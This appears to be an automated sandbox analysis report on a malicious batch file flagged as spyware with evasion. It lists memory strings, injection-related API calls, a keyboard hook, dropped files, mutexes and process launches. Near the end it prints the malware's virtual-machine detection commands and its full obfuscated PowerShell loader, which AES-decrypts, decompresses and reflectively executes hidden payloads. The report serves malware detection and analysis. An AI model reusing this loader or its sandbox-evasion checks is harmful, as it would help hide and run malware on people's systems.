Source: lsass.exe, 00000027.00000000.1748299304.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2560755573.0000017D2D400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000027.00000002.2553174289.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746323594.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1782893457.0000022553606000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2562894596.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753771735.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2563721606.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1752837446.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2565664638.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000027.00000002.2560755573.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1748299304.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 00000027.00000002.2560755573.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1748299304.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746542706.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2563721606.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: dwm.exe, 00000029.00000000.1764744714.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000029.00000002.2625112996.00000262ED790000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://osoft.co_2010-06X
Source: powershell.exe, 00000022.00000002.1740710530.000002254361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1721914542.00000000048C1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1740710530.00000225433F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2553174289.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746323594.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 00000022.00000002.1740710530.000002254361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 0000001C.00000002.2582592415.0000022F1DD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp, Null.14.drString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1740710530.00000225433F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001F.00000002.1721914542.00000000048C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xG
Source: powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000022.00000002.1740710530.000002254361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001F.00000002.1721914542.0000000004B7E000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1740710530.0000022544537000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 8084, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Q5N7WOpk8J.batStatic file information: 5235007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC71DF98 NtUnmapViewOfSection,34_2_00007FFAAC71DF98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC720F20 NtSetContextThread,34_2_00007FFAAC720F20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC720C5D NtWriteVirtualMemory,34_2_00007FFAAC720C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC720FE4 NtResumeThread,34_2_00007FFAAC720FE4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC720A3E NtUnmapViewOfSection,34_2_00007FFAAC720A3E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC71E078 NtUnmapViewOfSection,34_2_00007FFAAC71E078
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,37_2_0000000140001868
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D1E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,38_2_000001CA7D1E2C80
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD52300 NtQuerySystemInformation,StrCmpNIW,39_2_0000017D2DD52300
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$cnt-onimai2Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$cnt-onimai2\$cnt-CO2.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$cnt-onimai2\$cnt-CO2.bat\:Zone.Identifier:$DATAJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$cnt-sYvLLQ2I
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_czh1ayd4.gmu.ps1Jump to behavior
Source: C:\Windows\System32\cmd.exeCode function: 21_3_000001F1197923F021_3_000001F1197923F0
Source: C:\Windows\System32\cmd.exeCode function: 21_3_000001F11979CC9421_3_000001F11979CC94
Source: C:\Windows\System32\cmd.exeCode function: 21_3_000001F11979CE1821_3_000001F11979CE18
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197D2FF021_2_000001F1197D2FF0
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197DD89421_2_000001F1197DD894
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197DDA1821_2_000001F1197DDA18
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F119D5D89421_2_000001F119D5D894
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F119D52FF021_2_000001F119D52FF0
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F119D5DA1821_2_000001F119D5DA18
Source: C:\Windows\System32\conhost.exeCode function: 22_3_00000166BBF7CC9422_3_00000166BBF7CC94
Source: C:\Windows\System32\conhost.exeCode function: 22_3_00000166BBF723F022_3_00000166BBF723F0
Source: C:\Windows\System32\conhost.exeCode function: 22_3_00000166BBF7CE1822_3_00000166BBF7CE18
Source: C:\Windows\System32\conhost.exeCode function: 22_2_00000166BE492FF022_2_00000166BE492FF0
Source: C:\Windows\System32\conhost.exeCode function: 22_2_00000166BE49D89422_2_00000166BE49D894
Source: C:\Windows\System32\conhost.exeCode function: 22_2_00000166BE49DA1822_2_00000166BE49DA18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_04809B9131_2_04809B91
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC71DD5834_2_00007FFAAC71DD58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC71F63E34_2_00007FFAAC71F63E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC71F66B34_2_00007FFAAC71F66B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC71FDE934_2_00007FFAAC71FDE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC71E32934_2_00007FFAAC71E329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC71DC3534_2_00007FFAAC71DC35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC9977E934_2_00007FFAAC9977E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC99336234_2_00007FFAAC993362
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC994E2134_2_00007FFAAC994E21
Source: C:\Windows\System32\dllhost.exeCode function: 37_3_00000279A924CC9437_3_00000279A924CC94
Source: C:\Windows\System32\dllhost.exeCode function: 37_3_00000279A92423F037_3_00000279A92423F0
Source: C:\Windows\System32\dllhost.exeCode function: 37_3_00000279A924CE1837_3_00000279A924CE18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140001CF037_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140002D4C37_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_000000014000320437_2_0000000140003204
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_000000014000243437_2_0000000140002434
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_000000014000127437_2_0000000140001274
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A927D89437_2_00000279A927D894
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A9272FF037_2_00000279A9272FF0
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A927DA1837_2_00000279A927DA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A92AD89437_2_00000279A92AD894
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A92A2FF037_2_00000279A92A2FF0
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A92ADA1837_2_00000279A92ADA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_3_000001CA7D1BCE1838_3_000001CA7D1BCE18
Source: C:\Windows\System32\winlogon.exeCode function: 38_3_000001CA7D1BCC9438_3_000001CA7D1BCC94
Source: C:\Windows\System32\winlogon.exeCode function: 38_3_000001CA7D1B23F038_3_000001CA7D1B23F0
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D1EDA1838_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D1ED89438_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D1E2FF038_2_000001CA7D1E2FF0
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D21DA1838_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D21D89438_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D212FF038_2_000001CA7D212FF0
Source: C:\Windows\System32\lsass.exeCode function: 39_3_0000017D2DD2CE1839_3_0000017D2DD2CE18
Source: C:\Windows\System32\lsass.exeCode function: 39_3_0000017D2DD2CC9439_3_0000017D2DD2CC94
Source: C:\Windows\System32\lsass.exeCode function: 39_3_0000017D2DD223F039_3_0000017D2DD223F0
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD5DA1839_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD5D89439_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD52FF039_2_0000017D2DD52FF0
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD8DA1839_2_0000017D2DD8DA18
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD8D89439_2_0000017D2DD8D894
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD82FF039_2_0000017D2DD82FF0
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2446
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2441
Source: unknownProcess created: Commandline size = 5327
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2446Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2441Jump to behavior
Source: Process Memory Space: powershell.exe PID: 8084, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.spyw.evad.winBAT@51/21@1/1
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,37_2_0000000140002D4C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,33_2_004011AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,33_2_004017A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1836:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\de2c4de5-f170-45d0-bbf2-65b11fa7c60e
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xkid3nn.3jg.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Q5N7WOpk8J.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: powershell.exeString found in binary or memory: @{RootModule = 'PSReadLine.psm1'NestedModules = @("Microsoft.PowerShell.PSReadLine.dll")ModuleVersion = '2.0.0'GUID = '5714753b-2afd-4492-a5fd-01d9e2cff8b5'Author = 'Microsoft Corporation'CompanyName = 'Microsoft Corporation'Copyright = '(c) Microsoft Corporation. All rights reserved.'Description = 'Great command line editing in the PowerShell console host'PowerShellVersion = '5.0'DotNetFrameworkVersion = '4.6.1'CLRVersion = '4.0.0'FormatsToProcess = 'PSReadLine.format.ps1xml'AliasesToExport = @()FunctionsToExport = 'PSConsoleHostReadLine'CmdletsToExport = 'Get-PSReadLineKeyHandler','Set-PSReadLineKeyHandler','Remove-PSReadLineKeyHandler', 'Get-PSReadLineOption','Set-PSReadLineOption'HelpInfoURI = 'https://go.microsoft.com/fwlink/?LinkId=528806'PrivateData = @{ PSData = @{ Prerelease = 'beta2' } }}function PSConsoleHostReadLine{ Microsoft.PowerShell.Core\Set-StrictMode -Off [Microsoft.PowerShell.PSConsoleReadLine]::ReadLine($host.Runspace, $ExecutionContext)}prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml@{GUID="1DA87E53-152B-403E-98DC-74D7B4D63D59"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion = '5.1'CLRVersion="4.0"CmdletsToExport= "Format-List", "Format-Custom", "Format-Table", "Format-Wide", "Out-File", "Out-Printer", "Out-String", "Out-GridView", "Get-FormatData", "Export-FormatData", "ConvertFrom-Json", "ConvertTo-Json", "Invoke-RestMethod", "Invoke-WebRequest", "Register-ObjectEvent", "Register-EngineEvent", "Wait-Event", "Get-Event", "Remove-Event", "Get-EventSubscriber", "Unregister-Event", "New-Event", "Add-Member", "Add-Type", "Compare-Object", "ConvertTo-Html", "ConvertFrom-StringData", "Export-Csv", "Import-Csv", "ConvertTo-Csv", "ConvertFrom-Csv", "Export-Alias", "Invoke-Expression", "Get-Alias", "Get-Culture", "Get-Date", "Get-Host", "Get-Member", "Get-Random", "Get-UICulture", "Get-Unique", "Export-PSSession", "Import-PSSession", "Import-Alias", "Import-LocalizedData", "Select-String", "Measure-Object", "New-Alias", "New-TimeSpan", "Read-Host", "Set-Alias", "Set-Date", "Start-Sleep", "Tee-Object", "Measure-Command", "Update-List", "Update-TypeData", "Update-FormatData", "Remove-TypeData", "Get-TypeData", "Write-Host", "Write-Progress", "New-Object", "Select-Object", "Group-Object", "Sort-Object", "Get-Variable", "New-Variable", "Set-Variable", "Remove-Variable", "Clear-Variable", "Export-Clixml", "Import-Clixml", "ConvertTo-Xml", "Select-Xml", "Write-Debug", "Write-Verbose", "Write-Warning", "Write-Error", "Write-Information", "Write-Output", "Set-PSBreakpoint", "Get-PSBreakpoint", "Remove-PSBreakpoint", "Enable-PSBreakpoint", "Disable-PSBreakpoint", "Get-PSCallStack", "Send-MailMessag
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Q5N7WOpk8J.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
